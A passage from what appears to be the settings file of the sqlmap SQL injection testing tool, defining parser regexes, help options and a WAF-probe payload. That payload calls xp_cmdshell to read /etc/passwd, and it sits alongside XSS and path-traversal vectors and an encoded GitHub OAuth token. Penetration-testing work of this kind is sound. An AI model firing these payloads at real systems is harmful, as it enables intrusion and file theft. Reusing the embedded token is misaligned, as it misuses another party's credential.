MAXDB_ALIASES), (DBMS.SYBASE, SYBASE_ALIASES), (DBMS.DB2, DB2_ALIASES), (DBMS.HSQLDB, HSQLDB_ALIASES), (DBMS.H2, H2_ALIASES), (DBMS.INFORMIX, INFORMIX_ALIASES), (DBMS.MONETDB, MONETDB_ALIASES), (DBMS.DERBY, DERBY_ALIASES), (DBMS.VERTICA, VERTICA_ALIASES), (DBMS.MCKOI, MCKOI_ALIASES), (DBMS.PRESTO, PRESTO_ALIASES), (DBMS.ALTIBASE, ALTIBASE_ALIASES), (DBMS.MIMERSQL, MIMERSQL_ALIASES), (DBMS.CRATEDB, CRATEDB_ALIASES), (DBMS.CUBRID, CUBRID_ALIASES), (DBMS.CACHE, CACHE_ALIASES), (DBMS.EXTREMEDB, EXTREMEDB_ALIASES), (DBMS.FRONTBASE, FRONTBASE_ALIASES), (DBMS.RAIMA, RAIMA_ALIASES), (DBMS.VIRTUOSO, VIRTUOSO_ALIASES))\n\nUSER_AGENT_ALIASES = (\"ua\", \"useragent\", \"user-agent\")\nREFERER_ALIASES = (\"ref\", \"referer\", \"referrer\")\nHOST_ALIASES = (\"host\",)\n\n# DBMSes with upper case identifiers\nUPPER_CASE_DBMSES = set((DBMS.ORACLE, DBMS.DB2, DBMS.FIREBIRD, DBMS.MAXDB, DBMS.H2, DBMS.DERBY, DBMS.ALTIBASE))\n\n# Default schemas to use (when unable to enumerate)\nH2_DEFAULT_SCHEMA = HSQLDB_DEFAULT_SCHEMA = \"PUBLIC\"\nVERTICA_DEFAULT_SCHEMA = \"public\"\nMCKOI_DEFAULT_SCHEMA = \"APP\"\nCACHE_DEFAULT_SCHEMA = \"SQLUser\"\n\n# DBMSes where OFFSET mechanism starts from 1\nPLUS_ONE_DBMSES = set((DBMS.ORACLE, DBMS.DB2, DBMS.ALTIBASE, DBMS.MSSQL, DBMS.CACHE))\n\n# Names that can't be used to name files on Windows OS\nWINDOWS_RESERVED_NAMES = (\"CON\", \"PRN\", \"AUX\", \"NUL\", \"COM1\", \"COM2\", \"COM3\", \"COM4\", \"COM5\", \"COM6\", \"COM7\", \"COM8\", \"COM9\", \"LPT1\", \"LPT2\", \"LPT3\", \"LPT4\", \"LPT5\", \"LPT6\", \"LPT7\", \"LPT8\", \"LPT9\")\n\n# Items displayed in basic help (-h) output\nBASIC_HELP_ITEMS = (\n    \"url\",\n    \"googleDork\",\n    \"data\",\n    \"cookie\",\n    \"randomAgent\",\n    \"proxy\",\n    \"testParameter\",\n    \"dbms\",\n    \"level\",\n    \"risk\",\n    \"technique\",\n    \"getAll\",\n    \"getBanner\",\n    \"getCurrentUser\",\n    \"getCurrentDb\",\n    \"getPasswordHashes\",\n    \"getTables\",\n    \"getColumns\",\n    \"getSchema\",\n    \"dumpTable\",\n    \"dumpAll\",\n    \"db\",\n    \"tbl\",\n    \"col\",\n    \"osShell\",\n    \"osPwn\",\n    \"batch\",\n    \"checkTor\",\n    \"flushSession\",\n    \"tor\",\n    \"sqlmapShell\",\n    \"wizard\",\n)\n\n# Tags used for value replacements inside shell scripts\nSHELL_WRITABLE_DIR_TAG = \"%WRITABLE_DIR%\"\nSHELL_RUNCMD_EXE_TAG = \"%RUNCMD_EXE%\"\n\n# String representation for NULL value\nNULL = \"NULL\"\n\n# String representation for blank ('') value\nBLANK = \"<blank>\"\n\n# String representation for current database\nCURRENT_DB = \"CD\"\n\n# String representation for current user\nCURRENT_USER = \"CU\"\n\n# Name of SQLite file used for storing session data\nSESSION_SQLITE_FILE = \"session.sqlite\"\n\n# Regular expressions used for finding file paths in error messages\nFILE_PATH_REGEXES = (r\"<b>(?P<result>[^<>]+?)</b> on line \\d+\", r\"\\bin (?P<result>[^<>'\\\"]+?)['\\\"]? on line \\d+\", r\"(?:[>(\\[\\s])(?P<result>[A-Za-z]:[\\\\/][\\w. \\\\/-]*)\", r\"(?:[>(\\[\\s])(?P<result>/\\w[/\\w.~-]+)\", r\"\\bhref=['\\\"]file://(?P<result>/[^'\\\"]+)\", r\"\\bin <b>(?P<result>[^<]+): line \\d+\")\n\n# Regular expressions used for parsing error messages (--parse-errors)\nERROR_PARSING_REGEXES = (\n    r\"\\[Microsoft\\]\\[ODBC SQL Server Driver\\]\\[SQL Server\\](?P<result>[^<]+)\",\n    r\"<b>[^<]{0,100}(fatal|error|warning|exception)[^<]*</b>:?\\s*(?P<result>[^<]+)\",\n    r\"(?m)^\\s{0,100}(fatal|error|warning|exception):?\\s*(?P<result>[^\\n]+?)$\",\n    r\"(sql|dbc)[^>'\\\"]{0,32}(fatal|error|warning|exception)(</b>)?:\\s*(?P<result>[^<>]+)\",\n    r\"(?P<result>[^\\n>]{0,100}SQL Syntax[^\\n<]+)\",\n    r\"(?s)<li>Error Type:<br>(?P<result>.+?)</li>\",\n    r\"CDbCommand (?P<result>[^<>\\n]*SQL[^<>\\n]+)\",\n    r\"error '[0-9a-f]{8}'((<[^>]+>)|\\s)+(?P<result>[^<>]+)\",\n    r\"\\[[^\\n\\]]{1,100}(ODBC|JDBC)[^\\n\\]]+\\](\\[[^\\]]+\\])?(?P<result>[^\\n]+(in query expression|\\(SQL| at /[^ ]+pdo)[^\\n<]+)\",\n    r\"(?P<result>query error: SELECT[^<>]+)\"\n)\n\n# Regular expression used for parsing charset info from meta html headers\nMETA_CHARSET_REGEX = r'(?si)<head>.*<meta[^>]+charset=\"?(?P<result>[^\"> ]+).*</head>'\n\n# Regular expression used for parsing refresh info from meta html headers\nMETA_REFRESH_REGEX = r'(?i)<meta http-equiv=\"?refresh\"?[^>]+content=\"?[^\">]+;\\s*(url=)?[\"\\']?(?P<result>[^\\'\">]+)'\n\n# Regular expression used for parsing Javascript redirect request\nJAVASCRIPT_HREF_REGEX = r'<script>\\s*(\\w+\\.)?location\\.href\\s*=[\"\\'](?P<result>[^\"\\']+)'\n\n# Regular expression used for parsing empty fields in tested form data\nEMPTY_FORM_FIELDS_REGEX = r'(&|\\A)(?P<result>[^=]+=(&|\\Z))'\n\n# Reference: http://www.cs.ru.nl/bachelorscripties/2010/Martin_Devillers___0437999___Analyzing_password_strength.pdf\nCOMMON_PASSWORD_SUFFIXES = (\"1\", \"123\", \"2\", \"12\", \"3\", \"13\", \"7\", \"11\", \"5\", \"22\", \"23\", \"01\", \"4\", \"07\", \"21\", \"14\", \"10\", \"06\", \"08\", \"8\", \"15\", \"69\", \"16\", \"6\", \"18\")\n\n# Reference: http://www.the-interweb.com/serendipity/index.php?/archives/94-A-brief-analysis-of-40,000-leaked-MySpace-passwords.html\nCOMMON_PASSWORD_SUFFIXES += (\"!\", \".\", \"*\", \"!!\", \"?\", \";\", \"..\", \"!!!\", \", \", \"@\")\n\n# Splitter used between requests in WebScarab log files\nWEBSCARAB_SPLITTER = \"### Conversation\"\n\n# Splitter used between requests in BURP log files\nBURP_REQUEST_REGEX = r\"={10,}\\s+([A-Z]{3,} .+?)\\s+={10,}\"\n\n# Regex used for parsing XML Burp saved history items\nBURP_XML_HISTORY_REGEX = r'<port>(\\d+)</port>.*?<request base64=\"true\"><!\\[CDATA\\[([^]]+)'\n\n# Encoding used for Unicode data\nUNICODE_ENCODING = \"utf8\"\n\n# Reference: http://www.w3.org/Protocols/HTTP/Object_Headers.html#uri\nURI_HTTP_HEADER = \"URI\"\n\n# Uri format which could be injectable (e.g. www.site.com/id82)\nURI_INJECTABLE_REGEX = r\"//[^/]*/([^\\.*?]+)\\Z\"\n\n# Regex used for masking sensitive data\nSENSITIVE_DATA_REGEX = r\"(\\s|=)(?P<result>[^\\s=]*\\b%s\\b[^\\s]*)\\s\"\n\n# Options to explicitly mask in anonymous (unhandled exception) reports (along with anything carrying the <hostname> inside)\nSENSITIVE_OPTIONS = (\"hostname\", \"answers\", \"data\", \"dnsDomain\", \"googleDork\", \"authCred\", \"proxyCred\", \"tbl\", \"db\", \"col\", \"user\", \"cookie\", \"proxy\", \"fileRead\", \"fileWrite\", \"fileDest\", \"testParameter\", \"authCred\", \"sqlQuery\", \"requestFile\")\n\n# Maximum number of threads (avoiding connection issues and/or DoS)\nMAX_NUMBER_OF_THREADS = 10\n\n# Minimum range between minimum and maximum of statistical set\nMIN_STATISTICAL_RANGE = 0.01\n\n# Minimum value for comparison ratio\nMIN_RATIO = 0.0\n\n# Maximum value for comparison ratio\nMAX_RATIO = 1.0\n\n# Minimum length of sentence for automatic choosing of --string (in case of high matching ratio)\nCANDIDATE_SENTENCE_MIN_LENGTH = 10\n\n# Character used for marking injectable position inside provided data\nCUSTOM_INJECTION_MARK_CHAR = '*'\n\n# Wildcard value that can be used in option --ignore-code\nIGNORE_CODE_WILDCARD = '*'\n\n# Other way to declare injection position\nINJECT_HERE_REGEX = r\"(?i)%INJECT[_ ]?HERE%\"\n\n# Minimum chunk length used for retrieving data over error based payloads\nMIN_ERROR_CHUNK_LENGTH = 8\n\n# Maximum chunk length used for retrieving data over error based payloads\nMAX_ERROR_CHUNK_LENGTH = 1024\n\n# Do not escape the injected statement if it contains any of the following SQL keywords\nEXCLUDE_UNESCAPE = (\"WAITFOR DELAY '\", \" INTO DUMPFILE \", \" INTO OUTFILE \", \"CREATE \", \"BULK \", \"EXEC \", \"RECONFIGURE \", \"DECLARE \", \"'%s'\" % CHAR_INFERENCE_MARK)\n\n# Mark used for replacement of reflected values\nREFLECTED_VALUE_MARKER = \"__REFLECTED_VALUE__\"\n\n# Regular expression used for replacing border non-alphanum characters\nREFLECTED_BORDER_REGEX = r\"[^A-Za-z]+\"\n\n# Regular expression used for replacing non-alphanum characters\nREFLECTED_REPLACEMENT_REGEX = r\"[^\\n]{1,168}\"\n\n# Maximum time (in seconds) spent per reflective value(s) replacement\nREFLECTED_REPLACEMENT_TIMEOUT = 3\n\n# Maximum number of alpha-numerical parts in reflected regex (for speed purposes)\nREFLECTED_MAX_REGEX_PARTS = 10\n\n# Chars which can be used as a failsafe values in case of too long URL encoding value\nURLENCODE_FAILSAFE_CHARS = \"()|,\"\n\n# Factor used for yuge page multiplication\nYUGE_FACTOR = 1000\n\n# Maximum length of URL encoded value after which failsafe procedure takes away\nURLENCODE_CHAR_LIMIT = 2000\n\n# Default schema for Microsoft SQL Server DBMS\nDEFAULT_MSSQL_SCHEMA = \"dbo\"\n\n# Display hash attack info every mod number of items\nHASH_MOD_ITEM_DISPLAY = 11\n\n# Display marker for (cracked) empty password\nHASH_EMPTY_PASSWORD_MARKER = \"<empty>\"\n\n# Maximum integer value\nMAX_INT = sys.maxsize\n\n# Replacement for unsafe characters in dump table filenames\nUNSAFE_DUMP_FILEPATH_REPLACEMENT = '_'\n\n# Options that need to be restored in multiple targets run mode\nRESTORE_MERGED_OPTIONS = (\"col\", \"db\", \"dnsDomain\", \"privEsc\", \"tbl\", \"regexp\", \"string\", \"textOnly\", \"threads\", \"timeSec\", \"tmpPath\", \"uChar\", \"user\")\n\n# Parameters to be ignored in detection phase (upper case)\nIGNORE_PARAMETERS = (\"__VIEWSTATE\", \"__VIEWSTATEENCRYPTED\", \"__VIEWSTATEGENERATOR\", \"__EVENTARGUMENT\", \"__EVENTTARGET\", \"__EVENTVALIDATION\", \"ASPSESSIONID\", \"ASP.NET_SESSIONID\", \"JSESSIONID\", \"CFID\", \"CFTOKEN\")\n\n# Regular expression used for recognition of ASP.NET control parameters\nASP_NET_CONTROL_REGEX = r\"(?i)\\Actl\\d+\\$\"\n\n# Prefix for Google analytics cookie names\nGOOGLE_ANALYTICS_COOKIE_PREFIX = \"__UTM\"\n\n# Prefix for configuration overriding environment variables\nSQLMAP_ENVIRONMENT_PREFIX = \"SQLMAP_\"\n\n# General OS environment variables that can be used for setting proxy address\nPROXY_ENVIRONMENT_VARIABLES = (\"all_proxy\", \"ALL_PROXY\", \"http_proxy\", \"HTTP_PROXY\", \"https_proxy\", \"HTTPS_PROXY\")\n\n# Turn off resume console info to avoid potential slowdowns\nTURN_OFF_RESUME_INFO_LIMIT = 20\n\n# Strftime format for results file used in multiple target mode\nRESULTS_FILE_FORMAT = \"results-%m%d%Y_%I%M%p.csv\"\n\n# Official web page with the list of Python supported codecs\nCODECS_LIST_PAGE = \"http://docs.python.org/library/codecs.html#standard-encodings\"\n\n# Simple regular expression used to distinguish scalar from multiple-row commands (not sole condition)\nSQL_SCALAR_REGEX = r\"\\A(SELECT(?!\\s+DISTINCT\\(?))?\\s*\\w*\\(\"\n\n# Option/switch values to ignore during configuration save\nIGNORE_SAVE_OPTIONS = (\"saveConfig\",)\n\n# IP address of the localhost\nLOCALHOST = \"127.0.0.1\"\n\n# Default SOCKS ports used by Tor\nDEFAULT_TOR_SOCKS_PORTS = (9050, 9150)\n\n# Default HTTP ports used by Tor\nDEFAULT_TOR_HTTP_PORTS = (8123, 8118)\n\n# Percentage below which comparison engine could have problems\nLOW_TEXT_PERCENT = 20\n\n# Auxiliary value used in isDBMSVersionAtLeast() version comparison correction cases\nVERSION_COMPARISON_CORRECTION = 0.0001\n\n# These MySQL keywords can't go (alone) into versioned comment form (/*!...*/)\n# Reference: http://dev.mysql.com/doc/refman/5.1/en/function-resolution.html\nIGNORE_SPACE_AFFECTED_KEYWORDS = (\"CAST\", \"COUNT\", \"EXTRACT\", \"GROUP_CONCAT\", \"MAX\", \"MID\", \"MIN\", \"SESSION_USER\", \"SUBSTR\", \"SUBSTRING\", \"SUM\", \"SYSTEM_USER\", \"TRIM\")\n\n# Keywords expected to be in UPPERCASE in getValue()\nGET_VALUE_UPPERCASE_KEYWORDS = (\"SELECT\", \"FROM\", \"WHERE\", \"DISTINCT\", \"COUNT\")\n\nLEGAL_DISCLAIMER = \"Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program\"\n\n# After this number of misses reflective removal mechanism is turned off (for speed up reasons)\nREFLECTIVE_MISS_THRESHOLD = 20\n\n# Regular expression used for extracting HTML title\nHTML_TITLE_REGEX = r\"(?i)<title>(?P<result>[^<]+)</title>\"\n\n# Table used for Base64 conversion in WordPress hash cracking routine\nITOA64 = \"./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz\"\n\n# Options/switches to be ignored in command-line parsing (e.g. those passed from Firefox)\nIGNORED_OPTIONS = (\"--compressed\",)\n\n# Chars used to quickly distinguish if the user provided tainted parameter values\nDUMMY_SQL_INJECTION_CHARS = \";()'\"\n\n# Simple check against dummy users\nDUMMY_USER_INJECTION = r\"(?i)[^\\w](AND|OR)\\s+[^\\s]+[=><]|\\bUNION\\b.+\\bSELECT\\b|\\bSELECT\\b.+\\bFROM\\b|\\b(CONCAT|information_schema|SLEEP|DELAY|FLOOR\\(RAND)\\b\"\n\n# Extensions skipped by crawler\nCRAWL_EXCLUDE_EXTENSIONS = (\"3ds\", \"3g2\", \"3gp\", \"7z\", \"DS_Store\", \"a\", \"aac\", \"adp\", \"ai\", \"aif\", \"aiff\", \"apk\", \"ar\", \"asf\", \"au\", \"avi\", \"bak\", \"bin\", \"bk\", \"bmp\", \"btif\", \"bz2\", \"cab\", \"caf\", \"cgm\", \"cmx\", \"cpio\", \"cr2\", \"dat\", \"deb\", \"djvu\", \"dll\", \"dmg\", \"dmp\", \"dng\", \"doc\", \"docx\", \"dot\", \"dotx\", \"dra\", \"dsk\", \"dts\", \"dtshd\", \"dvb\", \"dwg\", \"dxf\", \"ear\", \"ecelp4800\", \"ecelp7470\", \"ecelp9600\", \"egg\", \"eol\", \"eot\", \"epub\", \"exe\", \"f4v\", \"fbs\", \"fh\", \"fla\", \"flac\", \"fli\", \"flv\", \"fpx\", \"fst\", \"fvt\", \"g3\", \"gif\", \"gz\", \"h261\", \"h263\", \"h264\", \"ico\", \"ief\", \"image\", \"img\", \"ipa\", \"iso\", \"jar\", \"jpeg\", \"jpg\", \"jpgv\", \"jpm\", \"jxr\", \"ktx\", \"lvp\", \"lz\", \"lzma\", \"lzo\", \"m3u\", \"m4a\", \"m4v\", \"mar\", \"mdi\", \"mid\", \"mj2\", \"mka\", \"mkv\", \"mmr\", \"mng\", \"mov\", \"movie\", \"mp3\", \"mp4\", \"mp4a\", \"mpeg\", \"mpg\", \"mpga\", \"mxu\", \"nef\", \"npx\", \"o\", \"oga\", \"ogg\", \"ogv\", \"otf\", \"pbm\", \"pcx\", \"pdf\", \"pea\", \"pgm\", \"pic\", \"png\", \"pnm\", \"ppm\", \"pps\", \"ppt\", \"pptx\", \"ps\", \"psd\", \"pya\", \"pyc\", \"pyo\", \"pyv\", \"qt\", \"rar\", \"ras\", \"raw\", \"rgb\", \"rip\", \"rlc\", \"rz\", \"s3m\", \"s7z\", \"scm\", \"scpt\", \"sgi\", \"shar\", \"sil\", \"smv\", \"so\", \"sub\", \"swf\", \"tar\", \"tbz2\", \"tga\", \"tgz\", \"tif\", \"tiff\", \"tlz\", \"ts\", \"ttf\", \"uvh\", \"uvi\", \"uvm\", \"uvp\", \"uvs\", \"uvu\", \"viv\", \"vob\", \"war\", \"wav\", \"wax\", \"wbmp\", \"wdp\", \"weba\", \"webm\", \"webp\", \"whl\", \"wm\", \"wma\", \"wmv\", \"wmx\", \"woff\", \"woff2\", \"wvx\", \"xbm\", \"xif\", \"xls\", \"xlsx\", \"xlt\", \"xm\", \"xpi\", \"xpm\", \"xwd\", \"xz\", \"z\", \"zip\", \"zipx\")\n\n# Patterns often seen in HTTP headers containing custom injection marking character '*'\nPROBLEMATIC_CUSTOM_INJECTION_PATTERNS = r\"(;q=[^;']+)|(\\*/\\*)\"\n\n# Template used for common table existence check\nBRUTE_TABLE_EXISTS_TEMPLATE = \"EXISTS(SELECT %d FROM %s)\"\n\n# Template used for common column existence check\nBRUTE_COLUMN_EXISTS_TEMPLATE = \"EXISTS(SELECT %s FROM %s)\"\n\n# Data inside shellcodeexec to be filled with random string\nSHELLCODEEXEC_RANDOM_STRING_MARKER = b\"XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX\"\n\n# Period after last-update to start nagging about the old revision\nLAST_UPDATE_NAGGING_DAYS = 180\n\n# Minimum non-writing chars (e.g. ['\"-:/]) ratio in case of parsed error messages\nMIN_ERROR_PARSING_NON_WRITING_RATIO = 0.05\n\n# Generic address for checking the Internet connection while using switch --check-internet (Note: https version does not work for Python < 2.7.9)\nCHECK_INTERNET_ADDRESS = \"http://ipinfo.io/json\"\n\n# Value to look for in response to CHECK_INTERNET_ADDRESS\nCHECK_INTERNET_VALUE = '\"ip\":'\n\n# Payload used for checking of existence of WAF/IPS (dummier the better)\nIPS_WAF_CHECK_PAYLOAD = \"AND 1=1 UNION ALL SELECT 1,NULL,'<script>alert(\\\"XSS\\\")</script>',table_name FROM information_schema.tables WHERE 2>1--/**/; EXEC xp_cmdshell('cat ../../../etc/passwd')#\"\n\n# Vectors used for provoking specific WAF/IPS behavior(s)\nWAF_ATTACK_VECTORS = (\n    \"\",  # NIL\n    \"search=<script>alert(1)</script>\",\n    \"file=../../../../etc/passwd\",\n    \"q=<invalid>foobar\",\n    \"id=1 %s\" % IPS_WAF_CHECK_PAYLOAD\n)\n\n# Used for status representation in dictionary attack phase\nROTATING_CHARS = ('\\\\', '|', '|', '/', '-')\n\n# Approximate chunk length (in bytes) used by BigArray objects (only last chunk and cached one are held in memory)\nBIGARRAY_CHUNK_SIZE = 1024 * 1024\n\n# Compress level used for storing BigArray chunks to disk (0-9)\nBIGARRAY_COMPRESS_LEVEL = 9\n\n# Maximum number of socket pre-connects\nSOCKET_PRE_CONNECT_QUEUE_SIZE = 3\n\n# Only console display last n table rows\nTRIM_STDOUT_DUMP_SIZE = 256\n\n# Reference: http://stackoverflow.com/a/3168436\n# Reference: https://web.archive.org/web/20150407141500/https://support.microsoft.com/en-us/kb/899149\nDUMP_FILE_BUFFER_SIZE = 1024\n\n# Parse response headers only first couple of times\nPARSE_HEADERS_LIMIT = 3\n\n# Step used in ORDER BY technique used for finding the right number of columns in UNION query injections\nORDER_BY_STEP = 10\n\n# Maximum value used in ORDER BY technique used for finding the right number of columns in UNION query injections\nORDER_BY_MAX = 1000\n\n# Maximum number of times for revalidation of a character in inference (as required)\nMAX_REVALIDATION_STEPS = 5\n\n# Characters that can be used to split parameter values in provided command line (e.g. in --tamper)\nPARAMETER_SPLITTING_REGEX = r\"[,|;]\"\n\n# Regular expression describing possible union char value (e.g. used in --union-char)\nUNION_CHAR_REGEX = r\"\\A\\w+\\Z\"\n\n# Attribute used for storing original parameter value in special cases (e.g. POST)\nUNENCODED_ORIGINAL_VALUE = \"original\"\n\n# Common column names containing usernames (used for hash cracking in some cases)\nCOMMON_USER_COLUMNS = (\"login\", \"user\", \"username\", \"user_name\", \"user_login\", \"benutzername\", \"benutzer\", \"utilisateur\", \"usager\", \"consommateur\", \"utente\", \"utilizzatore\", \"utilizator\", \"utilizador\", \"usufrutuario\", \"korisnik\", \"uporabnik\", \"usuario\", \"consumidor\", \"client\", \"cuser\")\n\n# Default delimiter in GET/POST values\nDEFAULT_GET_POST_DELIMITER = '&'\n\n# Default delimiter in cookie values\nDEFAULT_COOKIE_DELIMITER = ';'\n\n# Unix timestamp used for forcing cookie expiration when provided with --load-cookies\nFORCE_COOKIE_EXPIRATION_TIME = \"9999999999\"\n\n# Github OAuth token used for creating an automatic Issue for unhandled exceptions\nGITHUB_REPORT_OAUTH_TOKEN = \"Z2hwX2FOMDdpUWx0NDg0ak85QW4yU1pSQjhtazhBaVVlRzNaMUxmMA\"\n\n# Skip unforced HashDB flush requests below the threshold number of cached items\nHASHDB_FLUSH_THRESHOLD = 32\n\n# Number of retries for unsuccessful HashDB flush attempts\nHASHDB_FLUSH_RETRIES = 3\n\n# Number of retries for unsuccessful HashDB retrieve attempts\nHASHDB_RETRIEVE_RETRIES = 3\n\n# Number of retries for unsuccessful HashDB end transaction attempts\nHASHDB_END_TRANSACTION_RETRIES = 3\n\n# Unique milestone value used for forced deprecation of old HashDB values (e.g. when changing hash/pickle mechanism)\nHASHDB_MILESTONE_VALUE = \"OdqjeUpBLc\"  # python -c 'import random, string; print \"\".join(random.sample(string.ascii_letters, 10))'\n\n# Pickle protocl used for storage of serialized data inside HashDB (https://docs.python.org/3/library/pickle.html#data-stream-format)\nPICKLE_PROTOCOL = 2\n\n# Warn user of possible delay due to large page dump in full UNION query injections\nLARGE_OUTPUT_THRESHOLD = 1024 ** 2\n\n# On huge tables there is a considerable slowdown if every row retrieval requires ORDER BY (most noticable in table dumping using ERROR injections)\nSLOW_ORDER_COUNT_THRESHOLD = 10000\n\n# Give up on hash recognition if nothing was found in first given number of rows\nHASH_RECOGNITION_QUIT_THRESHOLD = 1000\n\n# Regular expression used for automatic hex conversion and hash cracking of (RAW) binary column values\nHASH_BINARY_COLUMNS_REGEX = r\"(?i)pass|psw|hash\"\n\n# Maximum number of redirections to any single URL - this is needed because of the state that cookies introduce\nMAX_SINGLE_URL_REDIRECTIONS = 4\n\n# Maximum total number of redirections (regardless of URL) - before assuming we're in a loop\nMAX_TOTAL_REDIRECTIONS = 10\n\n# Maximum (deliberate) delay used in page stability check\nMAX_STABILITY_DELAY = 0.5\n\n# Reference: http://www.tcpipguide.com/free/t_DNSLabelsNamesandSyntaxRules.htm\nMAX_DNS_LABEL = 63\n\n# Alphabet used for prefix and suffix strings of name resolution requests in DNS technique (excluding hexadecimal chars for not mixing with inner content)\nDNS_BOUNDARIES_ALPHABET = re.sub(r\"[a-fA-F]\", \"\", string.ascii_letters)\n\n# Alphabet used for heuristic checks\nHEURISTIC_CHECK_ALPHABET = ('\"', '\\'', ')', '(', ',', '.')\n\n# Minor artistic touch\nBANNER = re.sub(r\"\\[.\\]\", lambda _: \"[\\033[01;41m%s\\033[01;49m]\" % random.sample(HEURISTIC_CHECK_ALPHABET, 1)[0], BANNER)\n\n# String used for dummy non-SQLi (e.g. XSS) heuristic checks of a tested parameter value\nDUMMY_NON_SQLI_CHECK_APPENDIX = \"<'\\\">\"\n\n# Regular expression used for recognition of file inclusion errors\nFI_ERROR_REGEX = r\"(?i)[^\\n]{0,100}(no such file|failed (to )?open)[^\\n]{0,100}\"\n\n# Length of prefix and suffix used in non-SQLI heuristic checks\nNON_SQLI_CHECK_PREFIX_SUFFIX_LENGTH = 6\n\n# Connection read size (processing large responses in parts to avoid MemoryError crashes - e.g. large table dump in full UNION injections)\nMAX_CONNECTION_READ_SIZE = 10 * 1024 * 1024\n\n# Maximum response total page size (trimmed if larger)\nMAX_CONNECTION_TOTAL_SIZE = 100 * 1024 * 1024\n\n# For preventing MemoryError exceptions (caused when using large sequences in difflib.SequenceMatcher)\nMAX_DIFFLIB_SEQUENCE_LENGTH = 10 * 1024 * 1024\n\n# Page size threshold used in heuristic checks (e.g. getHeuristicCharEncoding(), identYwaf, htmlParser, etc.)\nHEURISTIC_PAGE_SIZE_THRESHOLD = 64 * 1024\n\n# Maximum (multi-threaded) length of entry in bisection algorithm\nMAX_BISECTION_LENGTH = 50 * 1024 * 1024\n\n# Mark used for trimming unnecessary content in large connection reads\nLARGE_READ_TRIM_MARKER = \"__TRIMMED_CONTENT__\"\n\n# Generic SQL comment formation\nGENERIC_SQL_COMMENT = \"-- [RANDSTR]\"\n\n# Threshold value for turning back on time auto-adjustment mechanism\nVALID_TIME_CHARS_RUN_THRESHOLD = 100\n\n# Check for empty columns only if table is sufficiently large\nCHECK_ZERO_COLUMNS_THRESHOLD = 10\n\n# Boldify all logger messages containing these \"patterns\"\nBOLD_PATTERNS = (\"' injectable\", \"provided empty\", \"leftover chars\", \"might be injectable\", \"' is vulnerable\", \"is not injectable\", \"does not seem to be\", \"test failed\", \"test passed\", \"live test final result\", \"test shows that\", \"the back-end DBMS is\", \"created Github\", \"blocked by the target server\", \"protection is involved\", \"CAPTCHA\", \"specific response\", \"NULL connection is supported\", \"PASSED\", \"FAILED\", \"for more than\", \"connection to \")\n\n# TLDs used in randomization of email-alike parameter values\nRANDOMIZATION_TLDS = (\"com\", \"net\", \"ru\", \"org\", \"de\", \"uk\", \"br\", \"jp\", \"cn\", \"fr\", \"it\", \"pl\", \"tv\", \"edu\", \"in\", \"ir\", \"es\", \"me\", \"info\", \"gr\", \"gov\", \"ca\", \"co\", \"se\", \"cz\", \"to\", \"vn\", \"nl\", \"cc\", \"az\", \"hu\", \"ua\", \"be\", \"no\", \"biz\", \"io\", \"ch\", \"ro\", \"sk\", \"eu\", \"us\", \"tw\", \"pt\", \"fi\", \"at\", \"lt\", \"kz\", \"cl\", \"hr\", \"pk\", \"lv\", \"la\", \"pe\", \"au\")\n\n# Generic www root directory names\nGENERIC_DOC_ROOT_DIRECTORY_NAMES = (\"htdocs\", \"httpdocs\", \"public\", \"wwwroot\", \"www\")\n\n# Maximum length of a help part containing switch/option name(s)\nMAX_HELP_OPTION_LENGTH = 18\n\n# Maximum number of connection retries (to prevent problems with recursion)\nMAX_CONNECT_RETRIES = 100\n\n# Strings for detecting formatting errors\nFORMAT_EXCEPTION_STRINGS = (\"Type mismatch\", \"Error converting\", \"Please enter a\", \"Conversion failed\", \"String or binary data would be truncated\", \"Failed to convert\", \"unable to interpret text value\", \"Input string was not in a correct format\", \"System.FormatException\", \"java.lang.NumberFormatException\", \"ValueError: invalid literal\", \"TypeMismatchException\", \"CF_SQL_INTEGER\", \"CF_SQL_NUMERIC\", \" for CFSQLTYPE \", \"cfqueryparam cfsqltype\", \"InvalidParamTypeException\", \"Invalid parameter type\", \"Attribute validation error for tag\", \"is not of type numeric\", \"<cfif Not IsNumeric(\", \"invalid input syntax for integer\", \"invalid input syntax for type\", \"invalid number\", \"character to number conversion error\", \"unable to interpret text value\", \"String was not recognized as a valid\", \"Convert.ToInt\", \"cannot be converted to a \", \"InvalidDataException\", \"Arguments are of the wrong type\")\n\n# Regular expression used for extracting ASP.NET view state values\nVIEWSTATE_REGEX = r'(?i)(?P<name>__VIEWSTATE[^\"]*)[^>]+value=\"(?P<result>[^\"]+)'\n\n# Regular expression used for extracting ASP.NET event validation values\nEVENTVALIDATION_REGEX = r'(?i)(?P<name>__EVENTVALIDATION[^\"]*)[^>]+value=\"(?P<result>[^\"]+)'\n\n# Number of rows to generate inside the full union test for limited output (mustn't be too large to prevent payload length problems)\nLIMITED_ROWS_TEST_NUMBER = 15\n\n# Default adapter to use for bottle server\nRESTAPI_DEFAULT_ADAPTER = \"wsgiref\"\n\n# Default REST-JSON API server listen address\nRESTAPI_DEFAULT_ADDRESS = \"127.0.0.1\"\n\n# Default REST-JSON API server listen port\nRESTAPI_DEFAULT_PORT = 8775\n\n# Unsupported options by REST-JSON API server\nRESTAPI_UNSUPPORTED_OPTIONS = (\"sqlShell\", \"wizard\")\n\n# Use \"Supplementary Private Use Area-A\"\nINVALID_UNICODE_PRIVATE_AREA = False\n\n# Format used for representing invalid unicode characters\nINVALID_UNICODE_CHAR_FORMAT = r\"\\x%02x\"\n\n# Regular expression for XML POST data\nXML_RECOGNITION_REGEX = r\"(?s)\\A\\s*<[^>]+>(.+>)?\\s*\\Z\"\n\n# Regular expression used for detecting JSON POST data\nJSON_RECOGNITION_REGEX = r'(?s)\\A(\\s*\\[)*\\s*\\{.*\"[^\"]+\"\\s*:\\s*(\"[^\"]*\"|\\d+|true|false|null|\\[).*\\}\\s*(\\]\\s*)*\\Z'\n\n# Regular expression used for detecting JSON-like POST data\nJSON_LIKE_RECOGNITION_REGEX = r\"(?s)\\A(\\s*\\[)*\\s*\\{.*('[^']+'|\\\"[^\\\"]+\\\"|\\w+)\\s*:\\s*('[^']+'|\\\"[^\\\"]+\\\"|\\d+).*\\}\\s*(\\]\\s*)*\\Z\"\n\n# Regular expression used for detecting multipart POST data\nMULTIPART_RECOGNITION_REGEX = 